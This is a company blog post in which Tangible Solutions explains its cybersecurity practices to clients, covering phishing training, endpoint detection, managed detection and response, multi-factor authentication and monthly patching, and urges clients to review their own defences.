When considering the cybersecurity challenges facing us all, we can and need to work together to ensure that our data remains safe. One cannot deny it is a scary world out there. However that doesn’t mean you have to give up. We can take one of two paths towards calming our fears. One option is to stick our head in the sand and hope that we are never hit with the type of attack or breach that is commonly reported in the news. The second approach is to have an open dialogue to educate ourselves and our partners on how we can best protect ourselves.
Nothing is ever impenetrable. The city of Troy proved that to us. However, taking time to understand the threats, methods of attack, and protections in place, we can better identify when something just does not look right. Time is critical when a threat becomes real. Everyone asks, what just happened? Identifying the source of a threat and how it was introduced to the environment is crucial in the early stages of a cyber incident. It is very important everyone understands that threat actors are constantly trying to trick us and they are great at it. Their tricks come as emails, texts, phone calls, websites and security holes within the systems that we rely upon.
What To Do
How can a business protect itself? To start, everyone in the organization should be educated about the threat landscape. For small and mid-size organizations, that may be a tough task. It would be worthwhile to invest in a 3rd-party service that specializes in helping companies understand cyber threats and ways to protect themselves. For example, Tangible uses a service called KnowBe4 as part of our employee educational program that addresses the email attack vector.
KnowBe4 will periodically send fake emails out that mimic real-world messages to test our employees’ ability to identify them and flag them. We can also flag other real emails that appear to be suspicious in order to have them evaluated before we take action on them. You would be amazed at how easy it is to fall for these emails. One of the most interesting observations since using this service is that it has brought about more talk and discussion amongst our staff that is encouraging and funny sometimes. There is no shame in being tricked, and once we all realized that, we have worked together proactively to flag potential threats.
Of course, as a company that deals with 3rd-party data, we have an obligation to make sure we are protecting our customers’ data. Regarding our approach to data security, there are many facets to it, but we primarily focus on Endpoint Detection and Response (EDR), Managed Detection and Response (MDR), Multi-factor Authentication (MFA), Patch Management and a well-trained staff. Each of these elements serves an important role in protecting our systems. Without the others, we wouldn’t be able to protect ourselves, as a chain is only as strong as its weakest link.
Endpoint Detection and Response
Many people are familiar with EDR products. They go by various names such as anti-virus, next generation anti-virus, firewall and others. Most people are probably familiar with Microsoft Windows Defender or Norton Anti-Virus as examples. At Tangible, we invested in a product called SentinelOne Complete. This is an enterprise class product that we have installed on every endpoint within our environment. The software not only provides the traditional AV protections, but extends into AI and behavioral patterns along with active threat hunting within our environment. These are a lot of fancy words, but basically the threats have become so sophisticated that you cannot use the old static methods of detection. The situation requires quick analysis and determination about whether the behavior or pattern is potentially dangerous. The outcome can be changed by how quickly a threat is identified and the offending process is flagged. This happens all within a matter of milliseconds. We have entrusted our systems to SentinelOne based on individual research, industry and peer recommendations and finally thoughtful engagement with them as a company.
Managed Detection and Response
Managed Detection and Response (MDR) is a critical and sometimes unattainable goal for a lot of organizations. MDR is typically layered on top of your EDR solution and will monitor and protect your systems 24x7x365. MDR will respond to a potential security incident with knowledge, precision and timeliness. That is a lot to handle, considering most of us sleep, enjoy time with family, and have other areas of responsibility within our organizations. Tangible engaged a MDR service because it made sense and not doing so would put a tremendous burden on our technical team. A managed detection and response service became necessary in order to make sure we went to bed at night with a clear head, a safe environment and knowing that we are doing right by our customers. So what and how is the MDR service in use by Tangible? Our MDR service is an always-on service that monitors our EDR Software (SentinelOne).
If an alert or suspicious activity is identified, the MDR service will respond immediately and either clear the alert or take action to stop it. Trained security experts can pretty quickly make a determination if the event is benign or of serious concern. They also have a clearly defined escalation path to engage their staff along with notifying us to mobilize. You may recall the term “threat hunting” from before. This is a powerful component of a MDR as a MDR service may have thousands of environments that they monitor. They have knowledge that they can apply to every monitored environment if they identify an attack on any of those customers. Couple this with active monitoring of the dark web along with other intelligence reports and you will see how powerful this can be. Our MDR Service is provided by SentinelOne Vigilance. We invite you to check out their year end report on Cybersecurity. It’s a complex document and you will appreciate the depth of detail and activity, both good and bad, going on daily. Tangible, partnered with our EDR and MDR solutions, has taken a very substantial step towards confronting the threats that exist.
Using another critical cybersecurity element, Multi-Factor authentication or MFA, is almost a must now for any online system that deals with sensitive data. Some statistics show that 90% of all cyber-attacks originate with compromised usernames and passwords. MFA, if understood and used correctly, could stop most of those. For those of you who use our hosting environment, you were introduced to Cisco’s DUO product, which we use for MFA. We have found it to be flexible, reliable and easy to use. It also allows us much tighter controls and security by seeing access attempts from foreign countries or unauthorized devices. The bad guys are always trying to trick us into approving access. Protecting usernames, passwords and ensuring that you only acknowledge a request for access when you request it is vitally important. Some of you may share usernames and access with other colleagues. Though we won’t pass judgment on that, we encourage you to think about how your cybersecurity vulnerability footprint increases dramatically by doing so.
Patch Management seems simple in concept, but it can be really difficult to stay on top of for various reasons. Tangible Solutions applies the principles behind the Microsoft Patch Tuesdays. On the second Tuesday of each month, Microsoft releases new patches for all supported product versions. These patches include some functional enhancements, but the ones that every IT professional has their eyes on are common vulnerabilities and exposures (CVEs). CVEs are things that are actively being exploited and need to be addressed. Not addressing these can lead to terrible consequences. Tangible Solutions uses a product called PatchManagerPlus (PMP) to do the patching of our servers. Each Patch Tuesday we start a consistent pattern of testing the patches on a small subset of servers and then continue on the rest of them. It takes time and patience to get through them all and we usually finish up just in time to start the process again. PMP manages patches for not only the Microsoft Windows components but also many other third-party products used within our cloud environment. Besides the servers, we also manage routers, switches, firewalls, access gateways, and many other devices. It is a long, tedious process that has its challenges, but thanks to a talented staff, we do our very best to keep things as current as possible.
The Client Side
Up to now, we have focused on what Tangible is doing to help protect your data. You may wonder what you should do with the information. First, you might familiarize yourself with the terms used above as they are fairly well known in the IT landscape. Second, we hope this information makes you feel more comfortable knowing how much attention Tangible Solutions pays to these threats. Next, it would be good to make an honest assessment of how well you feel your organization is approaching cyber threats. The actions you take today not only protect you but also everyone else within your organization and work community.
Have a discussion with your IT Team and understand their approach to cyber security and the tools they are using at your office. Hopefully, there is a synergy between what we are doing and what they are doing at your office. If you discover that you do not have the proper protections in place, don’t feel bad or discouraged, get to work. Start by having a discussion with cybersecurity professionals and come up with a plan. It takes time to develop a healthy and secure cybersecurity posture. We are happy to help in any way we can. There is a not a one size fits all approach, so it takes some collaboration to identify the best model for your needs. Though taking these steps does not make us invincible, it makes us knowledgeable… and knowing that we are working together as a team allows us to react and calmly navigate the turbulent waters.
If you need help or guidance, please contact the Tangible team.